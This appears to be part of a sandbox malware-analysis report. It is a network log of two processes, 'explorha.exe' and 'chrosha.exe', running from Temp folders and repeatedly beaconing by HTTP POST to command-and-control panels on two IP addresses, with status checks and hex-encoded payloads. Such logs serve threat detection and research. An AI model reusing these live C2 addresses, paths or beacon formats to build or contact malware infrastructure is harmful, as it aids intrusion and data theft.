Apr 19, 2024 03:30:52.133841991 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:52.385466099 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      202 | 192.168.2.5 | 50043 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:52.600255966 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:52.847877979 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:52.848735094 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:53.100982904 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      203 | 192.168.2.5 | 50044 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:52.744927883 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:52.993236065 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      204 | 192.168.2.5 | 50045 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:53.015222073 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:53.272310972 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      205 | 192.168.2.5 | 50046 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:53.457995892 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:53.701596975 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:53.702600956 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:53.951034069 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      206 | 192.168.2.5 | 50047 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:53.631294966 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:53.872534037 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      207 | 192.168.2.5 | 50048 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:54.124835014 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:54.378406048 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      208 | 192.168.2.5 | 50049 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:54.306655884 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:54.555742979 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:54.556777954 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:54.813754082 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      209 | 192.168.2.5 | 50050 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:54.745862007 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:54.993726969 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      210 | 192.168.2.5 | 50051 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:55.177989006 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:55.420648098 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:55.421571970 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:55.671516895 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
211 | 192.168.2.5 | 50052 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:55.241091967 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:55.488780975 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
212 | 192.168.2.5 | 50053 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:55.858253956 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:56.110320091 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
213 | 192.168.2.5 | 50054 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:56.017062902 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:56.260581017 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:56.261573076 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:56.510672092 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
214 | 192.168.2.5 | 50055 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:56.365078926 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
